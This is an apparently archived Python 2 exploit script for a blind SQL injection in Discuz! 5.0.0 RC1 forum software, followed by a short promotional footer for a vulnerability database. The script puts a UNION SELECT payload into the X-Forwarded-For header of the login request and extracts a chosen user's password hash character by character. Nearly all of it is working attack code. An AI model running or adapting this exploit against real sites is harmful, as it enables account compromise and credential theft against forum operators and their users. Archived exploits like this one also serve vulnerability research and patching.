#!c:\python24\pyton<br />
# Discuz! 5.0.0 RC1 SQL injection PoC<br />
# Author: wofeiwo thx superheis help<br />
# Date: Aug 12th 2006<br />
<br />
import sys<br />
import httplib<br />
from urlparse import urlparse<br />
from time import sleep<br />
<br />
def injection(lenthofpass,realurl,path):<br />
sys.stdout.write('[+]The uid='+sys.argv[2]+' password hash is: \n')<br />
for num in range(1,lenthofpass+1): #相当于[1,...,32],num代表32位的MD5值<br />
ran=range(97, 123) #ran=[97,...,122],ASCII码的a-z<br />
#for a1 in range(65,91): #a1=[65,90],ASCII码的A-Z<br />
# ran.append(a1)<br />
for a in range(48, 58): #a=[48,...,57],ASCII码的0-9<br />
ran.append(a) #将序列a加入到序列ran中<br />
<br />
for i in ran: #遍历ran序列,包括全部小写字母和数字<br />
<br />
query = '\' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + str(num) + ',1))=' + str(i) + ' /*'<br />
#下面是一个字典:<br />
header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}<br />
data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"<br />
#print header<br />
#sys.exit(1)<br />
http = httplib.HTTPConnection(realurl[1]) #连接到如:httplib.HTTPConnection('www.cwi.nl')<br />
http.request("POST", path + "logging.php?action=login&",data , header) #发送POS数据包<br />
#sleep(1)<br />
response = http.getresponse() #得到服务的响应包<br />
re1 = response.read() #读出所有响应数据并存入ret1中<br />
#print "re1中返回的内容为:"<br />
#print re1<br />
if re1.find('SELECT') ==1: #re1中是否含有SELECT字符,是为1,否返回-1<br />
print '[-] Unvalnerable host' #不存在漏洞<br />
print '[-] Exit..'<br />
sys.exit(1);<br />
<br />
elif re1.find('ip3') == -1:#re1中是否含有ip3字符,是为1,否返回-1<br />
sys.stdout.write(chr(i)) #输出正确的MD5密码值<br />
#print chr(i)<br />
http.close()<br />
#sleep(1)<br />
#break<br />
<br />
#print re1<br />
#print '-----------------------------------------------'<br />
http.close()<br />
#sleep(1)<br />
sys.stdout.write('\n') #打印回车<br />
<br />
def main ():<br />
print 'Discuz! 5.0.0 RC1 SQL injection exploit'<br />
print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'<br />
<br />
if len(sys.argv) == 3:<br />
url = urlparse(sys.argv[1])<br />
if url[2:-1] != '/': #从元组中第三个到倒数第二个参数<br />
u = url[2] + '/'<br />
else:<br />
u = url[2] #u=/dz/<br />
else:<br />
print "Usage: %s <url> <uid>" % sys.argv[0]<br />
print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]<br />
sys.exit(0)<br />
<br />
lenth = 32 #长度为32<br />
print '[+] Connect %s' % url[1]<br />
print '[+] Trying...'<br />
print '[+] Plz wait a long long time...'<br />
<br />
injection(lenth, url, u)<br />
<br />
print '[+] Finished'<br />
<br />
if __name__ == '__main__': main()<br />
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation